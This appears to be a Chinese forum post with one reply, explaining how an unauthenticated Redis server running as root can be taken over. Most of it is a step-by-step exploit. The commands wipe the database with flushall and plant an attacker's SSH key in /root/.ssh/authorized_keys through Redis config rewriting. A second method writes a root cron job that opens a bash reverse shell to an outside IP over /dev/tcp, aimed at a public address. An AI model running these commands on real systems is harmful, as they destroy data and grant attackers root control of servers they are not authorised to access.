redis配置不当可导致服务器被控制

admin

服务器配置不当包括三个部分:
1.Redis服务使用ROOT账号启动
2.Redis服务无密码认证或者使用的是弱口令进行认证
3.服务器开放了SSH服务，而且允许使用密钥登录

简单的写下过程

1. ###测试环境
   
2. ```
   
3. victim server CentOS6.6+redis2.4  192.168.192.133
   
4. 
   
5. attack server CentOS6.6  192.168.192.132
   
6. 
   
7. ```
   
8. 
   
9. 先在attack server生成一个公钥
   
10. ```
    
11. ssh-keygen -t rsa -C "redis"
    
12. (echo -e "\n\n"; cat redis.pub; echo -e "\n\n") > redis.txt
    
13. ```
    
14. 然后执行
    
15. ```
    
16. redis-cli -h 192.168.192.133 flushall
    
17. 
    
18. cat redis.txt | redis-cli -h 192.168.192.133 -x set pwn
    
19. 
    
20. ```
    
21. 登录redis并修改其配置  redis-cli -h 192.168.192.133
    
22. ```
    
23. CONFIG set dir /root/.ssh/
    
24. config set dbfilename "authorized_keys"
    
25. save
    
26. exit
    
27. ```
    
28. 然后就可以使用ssh的公钥登录了
    
29. ```
    
30. ssh -i redis root@192.168.192.133
    
31. ```

复制代码

也可以创建计划任务：

1. echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/114.114.114.114/53 0>&1\n\n"|redis-cli -h 115.182.69.199 -p 3000 -x set 0
   
2. 
   
3. config set dir /var/spool/cron/
   
4. 
   
5. config set dbfilename root

复制代码

xunnun

有的地方错了，改改吧。